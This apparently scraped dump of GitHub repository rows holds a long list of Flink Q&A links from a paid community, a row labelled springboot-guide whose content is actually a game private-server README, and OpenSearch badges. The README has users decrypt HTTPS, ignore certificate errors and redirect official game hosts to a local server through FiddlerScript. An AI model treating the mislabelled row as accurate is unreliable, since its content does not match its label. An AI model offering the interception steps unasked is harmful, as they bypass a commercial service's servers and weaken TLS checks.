307、[使用rocksdb作为状态后端,对于使用sql方式对时间字段进行group by,以达到去窗口化,但是这样没办法对之前的数据清理,导致磁盘空间很大,对于这种非编码方式,有什么办法设置ttl,清理以前的数据吗](https://t.zsxq.com/A6UN7eE)
308、[请问什么时间窗为什么会有TimeWindow{start=362160000, end=362220000}
和 TimeWindow{start=1568025300000, end=1568025360000}这两种形式,我都用的是一分钟的TumblingEventTimeWindows,为什么会出现不同的情况?](https://t.zsxq.com/a2fUnEM)
309、[比如我统计一天的订单量。但是某个数据延迟一天才到达。比如2019.08.01这一天订单量应该是1000,但是有个100的单据迟到了,在2019.08.02才到达,那么导致2019.08.01这一天统计的是900.后面怎么纠正这个错误的结果呢](https://t.zsxq.com/Y3jqjuj)
310、[flink streaming 模式下只使用堆内内存么](https://t.zsxq.com/zJaMNne)
311、[如果考虑到集群的迁移,状态能迁移吗](https://t.zsxq.com/EmMrvVb)
312、[我们现在有一个业务场景,数据上报的值是这样的格式(时间,累加值),我们需要这样的格式数据(时间,当前值)。当前值=累加值-前一个数据的累加值。flink如何做到呢,有考虑过state机制,但是服务宕机后,state就被清空了](https://t.zsxq.com/6EUFeqr)
313、[Flink On k8s 与 Flink on Yarn相比的优缺点是什么?那个更适合在生产环境中使用呢](https://t.zsxq.com/y7U7Mzf)
314、[有没有datahub链接flink的 连接器呀](https://t.zsxq.com/zVNbaYn)
315、[单点resourcemanager 挂了,对任务会产生什么影响呢](https://t.zsxq.com/FQRNJ2j)
316、[flink监控binlog,跟另一张维表做join后,sink到MySQL的最终表。对于最终表的增删改操作,需要定义不同的sink么?](https://t.zsxq.com/rnemUN3)
317、[请问窗口是在什么时候合并的呢?例如:数据进入windowoperator的processElement,如果不是sessionwindow,是否会进行窗口合并呢?](https://t.zsxq.com/JaaQFqB)
318、[Flink中一条流能参与多路计算,并多处输出吗?他们之前会不会相互影响?](https://t.zsxq.com/AqNFM33)
319、[keyBy算子定义是将一个流拆分成不相交的分区,每个分区包含具有相同的key的元素。我不明白的地方是: keyBy怎么设置分区数,是给这个算子设置并行度吗? 分区数和slot数量是什么关系?](https://t.zsxq.com/nUzbiYj)
320、[动态cep-pattern,能否详细说下?滴滴方案未公布,您贴出来的几张图片是基于1.7的。或者有什么想法也可以讲解下,谢谢了](https://t.zsxq.com/66URfQb)
321、[问题1:使用常驻型session ./bin/yarn-session.sh -n 10 -s 3 -d启动,这个时候分配的资源是yarn 队列里面的, flink提交任务 flink run xx.jar, 其余机器是怎样获取到flink需要运行时的环境的,因为我只在集群的一台机器上有flink 安装包。](https://t.zsxq.com/maEQ3NR)
322、[flink task manager中slot间的内存隔离,cpu隔离是怎么实现的?flink 设计slot的概念有什么意义,为什么不像spark executor那样,内部没有做隔离?](https://t.zsxq.com/YjEYjQz)
323、[spark和kafka集成,direct模式,spark的一个分区对应kafka的一个主题的一个分区。那flink和kafka集成的时候,怎么消费kafka的数据,假设kafka某个主题5个partition](https://t.zsxq.com/nuzvVzZ)
324、[./bin/flink run -m yarn-cluster 执行的flink job ,作业自己打印的日志通过yarn application的log查看不了,只有集群自身的日志,程序中logger.info打印日志存放在哪,还是我打包的方式问题,打日志用的是slf4j。](https://t.zsxq.com/27u3ZZf)
325、[在物联网平台中,需要对每个key下的数据做越限判断,由于每个key的越限值是不同的,越限值配置在实时数据库中。
若将越限值加载到state中,由于key的量很大(大概3亿左右),会导致state太大,可能造成内存溢出。若在处理数据时从实时数据库中读取越限值,由于网络IO开销,可能造成实时性下降。请问该如何处理?谢谢](https://t.zsxq.com/miuzFY3)
326、[如果我一个flink程序有多个window操作,时间戳和watermark是不是每个window都需要分配,还有就是事件时间是不是一定要在数据源中就存在某个字段](https://t.zsxq.com/amURvZR)
327、[有没有flink1.9刚支持的用ddl链接kafka并写入hbase的资料,我们公司想把离线的数仓逐渐转成实时的,写sql对于我们来说上手更快一些,就想找一些这方面的资料学习一下。](https://t.zsxq.com/eqFuBYz)
328、[flink1.9 进行了数据类型的转化时发生了不匹配的问题, 目前使用的Type被弃用,推荐使用是datatypes 类型,但是之前使用的Type类型的方法 对应的schema typeinformation 目前跟datatypes的返回值不对应,请问下 该怎么去调整适配?](https://t.zsxq.com/yVvR3V3)
329、[link中处理数据其中一条出了异常都会导致整个job挂掉?有没有方法(除了异常捕获)让这条数据记录错误日志就行 下面的数据接着处理呢? 粗略看过一些容错处理,是关于程度挂了重启后从检查点拉取数据,但是如果这条数据本身就问提(特别生产上,这样就导致job直接挂了,影响有点大),那应该怎么过滤掉这条问题数据呢(异常捕获是最后的方法](https://t.zsxq.com/6AIQnEi)
330、[我在一个做日报的统计中使用rabbitmq做数据源,为什么rabbitmq中的数据一直处于unacked状态,每分钟触发一次窗口计算,并驱逐计算过的元素,我在测试环境数据都能ack,但是一到生产环境就不行了,也没有报错,有可能是哪里出了问题啊](https://t.zsxq.com/RBmi2vB)
331、[我们目前数据流向是这样的,kafka source ,etl,redis sink 。这样chk 是否可以保证端到端语义呢?](https://t.zsxq.com/fuNfuBi)
332、[1.在通过 yarn-session 提交 flink job 的时候。flink-core, flink-clients, flink-scala, flink-streaming-scala, scala-library, flink-connector-kafka-0.10 那些应该写 provided scope,那些应该写 compile scope,才是正确、避免依赖冲突的姿势?
2.flink-dist_2.11-1.8.0.jar 究竟包含了哪些依赖?(这个文件打包方式不同于 springboot,无法清楚看到有哪些 jar 依赖)](https://t.zsxq.com/mIeMzvf)
333、[Flink 中使用 count window 会有这样的问题就是,最后有部分数据一直没有达到 count 的值,然后窗口就一直不触发,这里看到个思路,可以将 time window + count window 组合起来](https://t.zsxq.com/AQzj6Qv)
334、[flink流处理时,注册一个流数据为Table后,该流的历史数据也会一直在Table里面么?为什么每次来新数据,历史处理过得数据会重新被执行?](https://t.zsxq.com/VvR3Bai)
335、[available是变化数据,除了最新的数据被插入数据库,之前处理过数据又重新执行了几次](https://t.zsxq.com/jMfyNZv)
336、[这里两天在研究flink的广播变量,发现一个问题,DataSet数据集中获取广播变量,获取的内存地址是一样的(一台机器维护一个广播数据集)。在DataStream中获取广播变量就成了一个task维护一个数据集。(可能是我使用方式有问题) 所以想请教下星主,DataStream中获取一个画面变量可以如DataSet中一台机器维护一个数据吗?](https://t.zsxq.com/m6Yrv7Q)
337、[Flink程序开启checkpoint 机制后,用yarn命令多次killed以后,ckeckpoint目录下有多个job id,再次开辟资源重新启动程序,程序如何找到上一次jobid目录下,而不是找到其他的jobid目录下?默认是最后一个还是需要制定特定的jobid?](https://t.zsxq.com/nqzZrbq)
338、[发展昨天的数据重复插入问题,是把kafka里进来的数据流registerDataStream注册为Table做join时,打印表的长度发现,数据会一直往表里追加,怎样才能来一条处理一条,不往上追加呀](https://t.zsxq.com/RNzfQ7e)
339、[flink1.9 sql 有没有类似分区表那样的处理方式呢?我们现在有一个业务是1个source,但是要分别计算5分钟,10分钟,15分钟的数据。](https://t.zsxq.com/AqRvNNj)
340、[我刚弄了个服务器,在启动基础的命令时候发现task没有启动起来,导致web页是三个0,我看了log也没有报错信息,请问您知道可能是什么问题吗?](https://t.zsxq.com/q3feIuv)
241、[我自定义了个 Sink extends RichSinkFunction,有了 field: private transient Object lock;
这个 lock 我直接初始化 private transient Object lock = new Object(); 就不行,在 invoke 里 使用lock时空指针,如果lock在 自定义 Sink 的 构造器初始化也不行。但是在 open 方法里初始化就可以,为什么?能解释一下 执行原理吗?如果一个slot 运行着5个 sink实例,那么 这个sink对象会new 5个还是1个?](https://t.zsxq.com/EIiyjeU)
342、[请问Kafka的broker 个数怎么估算?](https://t.zsxq.com/aMNnIy3)
343、[flink on yarn如何远程调试](https://t.zsxq.com/BU7iqbi)
344、[目前有个需求:就是源数据是dataA、dataB、DataC通过kafka三个topic获取,然后进行合并。
但是有有几个问题,目前不知道怎么解决:
dataA=""id:10001,info:***,date:2019-08-01 12:23:33,entry1:1,entryInfo1:***""
dataB=""id:10001,org:***,entry:1"" dataC=""id:10001,location:***""
(1) 如何将三个流合并? (1) 数据中dataA是有时间的,但是dataB和dataC中都没有时间戳,那么如何解决eventTime及迟到乱序的问题?帮忙看下,谢谢](https://t.zsxq.com/F6U7YbY)
345、[我flink从kafka读json数据,在反序列化后中文部分变成了一串问号,请问如何做才能使中文正常](https://t.zsxq.com/JmIqfaE)
346、[我有好几个Flink程序(独立jar),在线业务数据分析时都会用到同样的一批MySQL中的配置数据(5千多条),现在的实现方法是每一个程序都是独立把这些配置数据装到内存中,便于快速使用,但现在感觉有些浪费资源和结构不够美观,请问这类情况有什么其他的解决方案吗?谢谢](https://t.zsxq.com/3BMZfAM)
347、[Flink checkpoint 选 RocksDBStateBackend 还是 FsStatebackEnd ,我们目前是任务执行一段时间之后 任务就会被卡死。](https://t.zsxq.com/RFMjYZn)
348、[flink on k8s的高可用、扩缩容这块目前还有哪些问题?](https://t.zsxq.com/uVv7uJU)
349、[有个问题问一下,是这样的现在Kafka4个分区每秒钟生产4000多到5000条日志数据,但是在消费者FLINK这边接收我只开了4个solt接收,这边只是接收后做切分存储,现在出现了延迟现象,我不清楚是我这边处切分慢了还是Flink接收kafka的数据慢了?Flink UI界面显示这两个背压高](https://t.zsxq.com/zFq3fqb)
350、[想请问一下,在flink集群模式下,能不能指定某个节点来执行一个task?](https://t.zsxq.com/NbaMjem)
+ [When is the merge method of an AggregateFunction actually used? Answers on Google say it merges the same key, but records with the same key should already be hashed to the same task, right? I don't quite understand this part](https://t.zsxq.com/VnEim6m)
+ [How would Flink handle this? 1. eventA initiates and eventB responds; every minute, compute the response success rate. eventA and eventB are correlated by the same commitId; eventA usually reaches Flink before eventB, but eventB may also arrive earlier. Requirement: if eventA has five records A, B, C, D, E and eventB has five records A', B', C', X', Y', the success rate is 3/5. 2. Compute the success rate of eventC (status 0 or 1) once per minute; the event logs may be reported repeatedly, so only the record with the earliest eventTime is counted, and anything already counted in the previous minute must not be counted again in the next minute](https://t.zsxq.com/eMnMrRJ)
+ [Could you systematically cover the HA design and source code analysis for YARN, Kubernetes, and standalone in the current Flink version?](https://t.zsxq.com/EamqrFQ)
+ [How do I submit a job through the Java API to run in yarn-cluster mode?](https://t.zsxq.com/vR76amq)
+ [Has anyone run into stream corruption issues? I don't know where to start troubleshooting](https://t.zsxq.com/6iMvjmq)
+ [Can the cause of the exception be seen from this log? I checked Kafka, YARN, and ZooKeeper and none of the three shows any problem](https://t.zsxq.com/uByFUrb)
+ [Why does Flink maintain two communication frameworks internally: Akka between the client and the JobManager and between the JobManager and TaskManagers, but Netty between TaskManagers?](https://t.zsxq.com/yvBiImq)
+ [A small question: in Flink's wordcount, what does the number followed by > in front of the console output mean?](https://t.zsxq.com/yzzBMji)
+ [I read from Kafka topicA, transform, and write to topicB with checkpointing enabled. The job runs normally and data is written to the new topic, but I want to monitor whether consumption of topicA is lagging; when I check the group with the Kafka client scripts, it says that groupid does not exist](https://t.zsxq.com/MNFUVnE)
+ [After splitting a Flink stream and running window computations on each branch, how can the results of the multiple windows be combined into one sink that outputs periodically? I want to compute different real-time metrics on multiple streams, e.g. aggregate several metrics every minute (the metrics live in different streams), and then store them as one tuple in MySQL](https://t.zsxq.com/mUfm2zF)
+ [How does Flink output eventually end up on a real-time data dashboard?](https://t.zsxq.com/nimeA66)
+ [Why, after keyBy, does data from different keys end up in the same AggregateFunction? Or do different keys share the same AggregateFunction instance? After I assign a value to an object inside the AggregateFunction, data from other keys overwrites the previous value. What is going on?](https://t.zsxq.com/IMzBUFA)
+ [How can the result of a Flink window computation be aggregated together with previous results?](https://t.zsxq.com/yFI2FYv)
+ [How should Flink-on-YARN jobs be monitored? The bundled InfluxDB metrics reporter doesn't seem able to collect metrics for Flink on YARN](https://t.zsxq.com/ZZ3FmqF)
+ [When Flink 1.9.0 consumes data from Kafka 0.10.1.1, the UI monitoring shows that the current offset and commit offset of some partitions stay negative and never change as the program runs. What is going on?](https://t.zsxq.com/QvRNjiU)
+ [In Flink 1.9, using rank throws org.apache.flink.table.api.TableException: RANK() on streaming table is not supported currently](https://t.zsxq.com/Y7MBaQb)
+ [Can a Flink job switch the Kafka source topic dynamically without restarting the job?](https://t.zsxq.com/rzVjMjM)
+ [1. What distinguishes keyed state from operator state (whether a shuffle has happened?) 2. What is the CheckpointedFunction interface for? 3. When is the snapshotState method called?](https://t.zsxq.com/ZVnEyne)
+ [How do people usually collect logs? The TaskManager seems to print the logs of different jobs all mixed together; is there a way to print them separately?](https://t.zsxq.com/AayjeiM)
+ [I just received a requirement to count today's cumulative online users with deduplication and display the result every 5 seconds. How should this be implemented?](https://t.zsxq.com/IuJ2FYR)
+ [A question about Flink consuming Kafka. We use Alibaba Cloud Kafka and can request consumers. Under the same topic A-test, consuming with consumer group A1, two programs see very different amounts of data on the source side: figure 1 consumes Kafka and writes into another Kafka topic, and only 100 records are seen so far; figure 2 consumes Kafka and writes to HDFS. Both start from the same offsets (the offsets are reset to the beginning after consuming); consuming by time or with a from-earliest strategy still yields only 100 records; I also turned off committing Kafka offsets to checkpoints and it is still 100 records. Very strange, so I'd like to ask whether this should be approached from the state side](https://t.zsxq.com/eqBUZFm)
+ [Are there any recommended Grafana dashboards? We currently collect metrics with the Prometheus pushgateway reporter, but it is still unclear which metrics deserve the most attention](https://t.zsxq.com/EYz7iMV)
+ [On YARN: 1. does session mode mean multiple Flink jobs are managed by the same JobManager? 2. does per-job mode start a separate JobManager for each job?](https://t.zsxq.com/u3vVV3b)
+ [Have you used Lettuce inside Flink to connect to a Redis cluster? I get the error Cannot retrieve initial cluster partitions from initial URIs](https://t.zsxq.com/VNnEQJ6)
+ [Hi zhisheng, when I use Flink sliding windows, a large amount of data is written to Redis every 10 minutes, which hurts online performance. Is there a way to throttle the speed of writes to Redis?](https://t.zsxq.com/62ZZJmi)
+ [In Flink standalone mode jobs are started with: flink run -c ClassName jar. How can the slots be distributed evenly? Currently only the slots on one machine keep being used, and once there are many jobs the TaskManager simply gets killed. The error message is shown in the second figure](https://t.zsxq.com/2zjqVnE)
+ [Hi zhisheng, in standalone and YARN clusters the master and workers rely on the SSH protocol to communicate with each other. Is there a way to set things up that does not depend on SSH?](https://t.zsxq.com/qzrvbaQ)
+ [In the official docs, what scenarios are the two kinds of periodic watermark generation each suited for?](https://t.zsxq.com/2fUjAQz)
+ [For periodic watermarks generated on a timer via ExecutionConfig.setAutoWatermarkInterval(…), how should that interval normally be estimated?](https://t.zsxq.com/7IEAyV3)
+ [Is it possible to obtain the time Flink spends allocating resources?](https://t.zsxq.com/YjqRBq3)
+ [When Flink produces data to Kafka it sometimes reports: This server does not host this topic-partition](https://t.zsxq.com/vJyJiMJ)
+ [Started in Flink-on-YARN mode with the log4j.properties configuration shown in the picture; on the YARN TaskManager page the logs can be seen on stdout, but no log file is created in the configured log directory. When running locally the log file is produced](https://t.zsxq.com/N3ZrZbQ)
+ [A question about flink2hbase: how can tables be created dynamically per day based on a date field in HBase? I wrote a custom HBase sink and create the table in the invoke method based on the record's time, but then every record has to check whether the table exists, which produces a lot of RPC requests. Is there a better way to handle this situation?](https://t.zsxq.com/3rNBubU)
+ [Hi, is there any material about TaskManagers, slots, memory, thread counts, process counts, CPU, and scheduling? For example how many threads a slot starts, why, how they are started, how tasks are scheduled, and so on. I couldn't find what I wanted online and the books aren't detailed enough; the source code is still hard for me to read, so I'd like to find some material first](https://t.zsxq.com/buBIAMf)
+ [Can a single FlinkKafkaConsumer be created in Flink to read multiple Kafka topics whose processing logic is identical, finally writing the data of each topic to its corresponding ES index? How would this be implemented?](https://t.zsxq.com/EY37aEm)
+ [Could you describe how events are kept in memory inside a window, for example a tumbling window, after multiple events enter it? Do they become one state, or does each event become a state? What is the relationship between events and state? How does the window clean up events once their event time has passed? And if the state backend is RocksDBStateBackend with incremental checkpoints, how are the saved expired events cleaned up?](https://t.zsxq.com/3vzzj62)
+ [How is Flink monitoring usually done, e.g. alerting when a job dies? I plan to use Prometheus for monitoring, but the reported metrics don't quite match my needs. My jobs are started with yarn-session, so one JobManager manages multiple jobs. I'm still new to Prometheus and may have missed some reported metrics; do you have any suggestions?](https://t.zsxq.com/vJyRnY7)
+ [Can ProcessingTime and EventTime be used together? When a job fails with an exception and a restart strategy is configured, does the restart resume from the latest checkpoint? I hit a database primary key conflict: the Kafka source only contains one message with that key, and the logs show the Redis connection pool threw an exception (Redis was restarting at the time), which made the job fail and retry; ProcessingTime was in use at the time](https://t.zsxq.com/BuZJaUb)
+ [In a custom flink-kafka deserializer, what is the better way to handle bad data? I saw an earlier question on this: if the exception is caught with try-catch, is it better to rethrow it or to return null?](https://t.zsxq.com/u3niYni)
+ [We use Flink to compare upstream and downstream data and have hit a performance bottleneck: one node can consume at most 50 records. The TaskManager GC logs show a max heap of 2.7 GB but a young generation of only 300 MB at most. Can Flink's JVM parameters be set in Flink-on-YARN mode?](https://t.zsxq.com/rvJYBuB)
+ [A conceptual question: what is the essential difference between side outputs and simply processing one stream in two different ways? I tried writing one stream to a cache and into a database at the same time, and both sides received the full data](https://t.zsxq.com/Ee27i6a)
+ [How do I define a Flink window that processes 500 records per second: 1. when Kafka has 10,000 records, still process 500 per second; 2. when Kafka has only 20 records, process them once every second](https://t.zsxq.com/u7YbyFe)
+ [Can a savepoint be triggered from the web UI, or can the UI only start a job from a savepoint?](https://t.zsxq.com/YfAqFUj)
+ [Is it possible to consume and pull messages from only certain Kafka partitions and not from the others? We have many scenarios where a topic has over a hundred partitions but I only need the data from a few of them](https://t.zsxq.com/AUfEAQB)
+ [I want to filter some of the data read from Kafka, with the filter conditions fetched from Redis (they depend on user configuration, so they need periodic refresh), which feels awkward; is there a better approach? Since there is no Redis source connector I read Redis with the Jedis client, but the data can't be fetched either. Also, how do you normally debug Flink code while writing it?](https://t.zsxq.com/qr7UzjM)
+ [Flink stores RocksDB state checkpoints on HDFS. Some jobs have very small state, but the minimum HDFS file size is 128 MB, so disk space fills up quickly. Is there any configuration to clean up checkpoints automatically?](https://t.zsxq.com/Ufqj2ZR)
+ [This is a real-time deduplication question. For example, when an order transaction happens, the business middle platform sends the order message to Kafka and Flink consumes it to sum the total amount. If the middle platform mistakenly sends the same order several times (same order id), the result gets accumulated repeatedly and the computed total exceeds the actual transaction amount. I need to deduplicate in a custom source via operator state, but operator state is bound to each source instance, so duplicate orders may be sent to different source instances; the state read there may not contain the order id recorded last time, and the duplicate order's amount would then be counted into the final result](https://t.zsxq.com/RzB6E6A)
+ [In a two-stream join, how can we make sure the data from both sides corresponds? For example, order messages and inventory messages: logically, when an order happens the inventory also changes, and both topics each send me a message at the same time; I join the two messages by order id. The problem is that if the inventory message is delayed by 5 or 10 seconds, the join finds no inventory message when the order message arrives. What should be done then?](https://t.zsxq.com/nunynmI)
+ [I have a comparison program built on Flink with a flink-kafka source. The business data is split into upstream and downstream and must be grouped by a field so that records with the same key from both sides are compared together. Since the two sides arrive at different times, I use an iterable 5-minute window for the comparison with a maximum of 3 iterations; the state backend is FsStateBackend. Monitoring shows that once the program exceeds 20,000 records per minute it stops consuming data: the web UI looks normal and there are no error logs in the JobManager or TaskManager stdout, but the program simply stops consuming](https://t.zsxq.com/nmeE2Fm)
+ [The capacity setting in async I/O: does it mean the number of concurrent requests in flight? If I set 10 cores per TaskManager and have 10 TaskManagers, can this value only be set to 100?](https://t.zsxq.com/vjimeiI)
+ [A performance question, in case anyone has relevant experience: a job reads one topic from Kafka and then splits the stream; after splitting with side outputs each branch is processed directly. Is the performance impact significant, e.g. with over a hundred subtasks after the split? Are there other good ways to split a stream?](https://t.zsxq.com/mEeUrZB)
+ [A production job threw the following exception but keeps running normally. How should this be investigated? Could you share some ideas?](https://t.zsxq.com/Eayzr3R)
And so on and so on; there are many more, and my hands are tired from all this copy-pasting 😂
In addition, the latest Flink materials (data, videos, slides, and excellent blog posts) are shared there promptly and updated continuously; I aim to keep it the most complete collection on the web, because I know there still isn't much Flink material out there.
[Some of my own thoughts and suggestions on learning Flink](https://t.zsxq.com/AybAimM)
[The most complete Flink materials on the whole web, continuously updated; click to get them](https://t.zsxq.com/iaEiyB2)
And one more thing that planet members asked me for: from time to time I share hands-on experience from Flink projects I have worked on, problems encountered in production, and how they were solved!
1、[How to view your own Job's execution plan and get the execution plan graph](https://t.zsxq.com/Zz3ny3V)
2、[What to do when real-time alerting meets tens of millions of backlogged Kafka messages?](https://t.zsxq.com/AIAQrnq)
3、[How to compare two values in a data stream? Several solutions](https://t.zsxq.com/QnYjy7M)
4、[Kafka article series](https://t.zsxq.com/6Q3vN3b)
5、[Flink environment deployment, application configuration, and running applications](https://t.zsxq.com/iiYfMBe)
6、[This is what a monitoring platform's architecture should look like](https://t.zsxq.com/yfYrvFA)
7、[Table of contents for the column series 《The Big Data “Blockbuster”: Real-Time Computing Framework Flink》](https://t.zsxq.com/beu7Mvj)
8、[Paid Chat article for 《The Big Data “Blockbuster”: Real-Time Computing Framework Flink》](https://t.zsxq.com/UvrRNJM)
9、[How does Apache Flink manage memory so well?](https://t.zsxq.com/zjQvjeM)
10、[Flink On K8s](https://t.zsxq.com/eYNBaAa)
11、[Flink-metrics-core](https://t.zsxq.com/Mnm2nI6)
12、[Flink-metrics-datadog](https://t.zsxq.com/Mnm2nI6)
13、[Flink-metrics-dropwizard](https://t.zsxq.com/Mnm2nI6)
14、[Flink-metrics-graphite](https://t.zsxq.com/Mnm2nI6)
15、[Flink-metrics-influxdb](https://t.zsxq.com/Mnm2nI6)
16、[Flink-metrics-jmx](https://t.zsxq.com/Mnm2nI6)
17、[Flink-metrics-slf4j](https://t.zsxq.com/Mnm2nI6)
18、[Flink-metrics-statsd](https://t.zsxq.com/Mnm2nI6)
19、[Flink-metrics-prometheus](https://t.zsxq.com/Mnm2nI6)
20、[Flink annotation source code analysis](https://t.zsxq.com/f6eAu3J)
21、[Building a Flink monitoring platform with InfluxDB and Grafana](https://t.zsxq.com/yVnaYR7)
22、[One article to understand Flink's internal Exactly Once and At Least Once](https://t.zsxq.com/UVfqfae)
23、[One article to thoroughly understand the big data real-time computing framework Flink](https://t.zsxq.com/eM3ZRf2)
Of course, besides Flink-related content I also post other big data material, because I wasn't a big data developer before and am catching up on a lot of knowledge myself! In short, I hope everyone who joins can improve together!
1、[Java core knowledge compilation.pdf](https://t.zsxq.com/7I6Iyrf)
2、[If I were the interviewer, these are the questions I would ask you](https://t.zsxq.com/myJYZRF)
3、[Kafka article series and learning videos](https://t.zsxq.com/iUZnamE)
4、[《Redefining Flink》 issue 2, pdf](https://t.zsxq.com/r7eIeyJ)
5、[GitChat Flink article Q&A notes](https://t.zsxq.com/ZjiYrVr)
6、[Key points to master for a Java concurrency course](https://t.zsxq.com/QZVJyz7)
7、[Lightweight Asynchronous Snapshots for Distributed Dataflows](https://t.zsxq.com/VVN7YB2)
8、[Apache Flink™- Stream and Batch Processing in a Single Engine](https://t.zsxq.com/VVN7YB2)
9、[Flink state management and fault tolerance](https://t.zsxq.com/NjAQFi2)
10、[Flink's unified stream and batch architecture and its practice at Alibaba](https://t.zsxq.com/MvfUvzN)
11、[Flink Checkpoint: lightweight distributed snapshots](https://t.zsxq.com/QVFqjea)
12、[Flink's unified stream and batch architecture and its practice at Alibaba](https://t.zsxq.com/MvfUvzN)
13、[Stream Processing with Apache Flink pdf](https://t.zsxq.com/N37mUzB)
14、[Monitoring platform practice combining Flink with machine learning algorithms](https://t.zsxq.com/m6EAaQ3)
15、[《The Big Data Blockbuster: Real-Time Computing Flink》 preparatory chapter: an introduction to real-time big data computing and its common use cases, pdf and video](https://t.zsxq.com/emMBaQN)
16、[《The Big Data Blockbuster: Real-Time Computing Flink》 opening chapter, pdf and video](https://t.zsxq.com/fqfuVRR)
17、[Four Flink books](https://t.zsxq.com/rVBQFI6)
18、[Papers on stream processing systems](https://t.zsxq.com/rVBQFI6)
19、[Apache Flink 1.9 features explained](https://t.zsxq.com/FyzvRne)
20、[Building a machine learning ecosystem on the Flink Table API](https://t.zsxq.com/FyzvRne)
21、[A big data platform based on Flink on Kubernetes](https://t.zsxq.com/FyzvRne)
22、[A high-performance machine learning algorithm library based on Apache Flink](https://t.zsxq.com/FyzvRne)
23、[Apache Flink applications and practice at Kuaishou](https://t.zsxq.com/FyzvRne)
24、[Apache Flink 1.9 compatibility with Hive](https://t.zsxq.com/FyzvRne)
25、[Building a machine learning ecosystem on the Flink Table API](https://t.zsxq.com/FyzvRne)
26、[Papers on stream processing systems](https://t.zsxq.com/rVBQFI6)"
CodingDocs/springboot-guide,master,5064,1390,2018-11-28T01:05:07Z,5354,16,SpringBoot2.0+从入门到实战!,asynchronous dubbo mybatis rabbitmq spring-data-jpa springboot,"👍Recommended: [download the source code of the latest (2021) hands-on projects](https://mp.weixin.qq.com/s?__biz=Mzg2OTA0Njk0OA==&mid=100018862&idx=1&sn=858e00b60c6097e3ba061e79be472280&chksm=4ea1856579d60c73224e4d852af6b0188c3ab905069fc28f4b293963fd1ee55d2069fb229848#rd)
👍[PDF version of 《JavaGuide: Interview Crash Edition》](#公众号). [Illustrated Computer Science Fundamentals, PDF version](#优质原创PDF资源)
The book list has been moved to the [awesome-cs](https://github.com/CodingDocs/awesome-cs) repository.
[EN](README.md) | [简中](docs/README_zh-CN.md) | [繁中](docs/README_zh-TW.md) | [JP](docs/README_ja-JP.md) | [RU](docs/README_ru-RU.md) | [FR](docs/README_fr-FR.md) | [KR](docs/README_ko-KR.md) | [VI](docs/README_vi-VI.md)
**Attention:** For any extra support, questions, or discussions, check out our [Discord](https://discord.gg/cfPKJ6N5hw).
### Notable features
- Basic game features: Logging in, team setup, inventory, basic scene/entity management
- Monster battles working
- Natural world monster/prop/NPC spawns
- Character techniques
- Crafting/Consumables working
- NPC shops handled
- Gacha system
- Mail system
- Friend system (Assists are not working yet)
- Forgotten hall
- Pure Fiction
- Simulated universe (Runs can be finished, but many features are missing)
# Running the server and client
### Prerequisites
* [Java 17 JDK](https://www.oracle.com/java/technologies/javase/jdk17-archive-downloads.html)
### Recommended
* [MongoDB 4.0+](https://www.mongodb.com/try/download/community)
### Compiling the server
1. Open your system terminal, and compile the server with `./gradlew jar`
2. Create a folder named `resources` in your server directory
3. Download the `Config`, `TextMap`, and `ExcelBin` folders from [https://github.com/Dimbreath/StarRailData](https://github.com/Dimbreath/StarRailData) and place them into your resources folder.
4. Delete the `/resources/Config/LevelOutput` folder.
5. Download the `Config` folder from [https://gitlab.com/Melledy/LunarCore-Configs](https://gitlab.com/Melledy/LunarCore-Configs) and place them into your resources folder. These are for world spawns and are very important for the server.
6. Run the server with `java -jar LunarCore.jar` from your system terminal. Lunar Core comes with a built-in internal MongoDB server for its database, so no Mongodb installation is required. However, it is highly recommended to install Mongodb anyway.
### Connecting with the client (Fiddler method)
1. **Log in with the client to an official server and Hoyoverse account at least once to download game data.**
2. Install and have [Fiddler Classic](https://www.telerik.com/fiddler) running.
3. Set fiddler to decrypt https traffic. (Tools -> Options -> HTTPS -> Decrypt HTTPS traffic) Make sure `ignore server certificate errors` is checked as well.
4. Copy and paste the following code into the Fiddlerscript tab of Fiddler Classic:
```
import System;
import System.Windows.Forms;
import Fiddler;
import System.Text.RegularExpressions;
class Handlers
{
static function OnBeforeRequest(oS: Session) {
if (oS.host.EndsWith("".starrails.com"") || oS.host.EndsWith("".hoyoverse.com"") || oS.host.EndsWith("".mihoyo.com"") || oS.host.EndsWith("".bhsr.com"")) {
oS.host = ""localhost""; // This can also be replaced with another IP address.
}
}
};
```
5. If `autoCreateAccount` is set to true in the config, then you can skip this step. Otherwise, type `/account create [account name]` in the server console to create an account.
6. Login with your account name, the password field is ignored by the server and can be set to anything.
### Server commands
Server commands can be run in the server console or in-game. There is a dummy user named ""Server"" in every player's friends list that you can message to use in-game commands.
```
/account {create | delete} [username] (reserved player uid). Creates or deletes an account.
/avatar lv(level) p(ascension) r(eidolon) s(skill levels). Sets the current avatar's properties.
/clear {relics | lightcones | materials | items}. Removes filtered items from the player inventory.
/gender {male | female}. Sets the player's gender.
/give [item id] x[amount] lv[number]. Gives the targeted player an item.
/giveall {materials | avatars | lightcones | relics}. Gives the targeted player items.
/heal. Heals your avatars.
/help. Displays a list of available commands.
/kick @[player id]. Kicks a player from the server.
/mail [content]. Sends the targeted player a system mail.
/permission {add | remove | clear} [permission]. Gives/removes a permission from the targeted player.
/refill. Refill your skill points in open world.
/reload. Reloads the server config.
/scene [scene id] [floor id]. Teleports the player to the specified scene.
/spawn [monster/prop id] x[amount] s[stage id]. Spawns a monster or prop near the targeted player.
/stop. Stops the server
/unstuck @[player id]. Unstucks an offline player if they're in a scene that doesn't load.
/worldlevel [world level]. Sets the targeted player's equilibrium level.
```
"
opensearch-project/OpenSearch,main,8663,1577,2021-01-29T22:10:00Z,570602,1662,🔎 Open source distributed and RESTful search engine.,analytics apache2 foss hacktoberfest java search search-engine,"
[![Chat](https://img.shields.io/badge/chat-on%20forums-blue)](https://forum.opensearch.org/c/opensearch/)
[![Documentation](https://img.shields.io/badge/documentation-reference-blue)](https://opensearch.org/docs/latest/opensearch/index/)
[![Code Coverage](https://codecov.io/gh/opensearch-project/OpenSearch/branch/main/graph/badge.svg)](https://codecov.io/gh/opensearch-project/OpenSearch)
[![Untriaged Issues](https://img.shields.io/github/issues/opensearch-project/OpenSearch/untriaged?labelColor=red)](https://github.com/opensearch-project/OpenSearch/issues?q=is%3Aissue+is%3Aopen+label%3A""untriaged"")
[![Security Vulnerabilities](https://img.shields.io/github/issues/opensearch-project/OpenSearch/security%20vulnerability?labelColor=red)](https://github.com/opensearch-project/OpenSearch/issues?q=is%3Aissue+is%3Aopen+label%3A""security%20vulnerability"")
[![Open Issues](https://img.shields.io/github/issues/opensearch-project/OpenSearch)](https://github.com/opensearch-project/OpenSearch/issues)
